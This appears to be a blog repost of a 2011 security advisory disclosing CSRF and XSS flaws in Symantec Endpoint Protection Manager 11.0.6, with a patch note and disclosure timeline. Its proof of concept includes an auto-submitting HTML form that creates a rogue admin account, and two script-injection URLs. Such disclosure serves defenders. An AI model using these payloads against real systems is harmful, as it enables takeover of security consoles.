Symantec End point Protection Manager Console lets user centrally manages the Symantec End point Protection clients. From the console user can install clients, set and enforce a securit ypolicy, and monitor and report on the clients. The console can be run from the computer hosting Symantec Endpoint Protection Manager or remotely through a Web-based interface.
Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Symantec Endpoint Protection Manager. These issues were discovered in a default installation of Symantec Endpoint Protection Manager 11.0.6. Other earlier versions may also be affected.
Proof of concept
Cross-Site Request Forgery (CSRF)
==========================
<html>
<body>
<form action="https://[target]:8443/portal/Settings.jsp?action=NewAccount"
id="csrf" method="post">
<input type="hidden" name="spcName" value="attacker" />
<input type="hidden" name="spcUsername" value="attacker" />
<input type="hidden" name="spcNewPwd" value="passwd123" />
<input type="hidden" name="spcNewPwd2" value="passwd123" />
<input type="hidden" name="group1" value="Admin" />
<input type="hidden" name="btnSubmit" value="Create+Account" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>
Cross-Site Scripting (XSS)
====================
- https://[target]:8443/console/apps/sepm/?>'"><script>alert(1)</script>
- https://[target]:8443/portal/Help.jsp?token='"--></style></script><script>alert(1)</script>
Solution
Symantec has released patches which address these issues. Please see the references for more information.
References
Vendor URL: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110810_00
Secunia: http://secunia.com/advisories/43662/
Disclosure Timeline
2011-03-07 - Vulnerabilities discovered.
2011-03-07 - Vulnerabilities reported to Secunia.
2011-03-09 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-08-10 - Patch released.
2011-08-11 - Advisory published by Secunia.
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.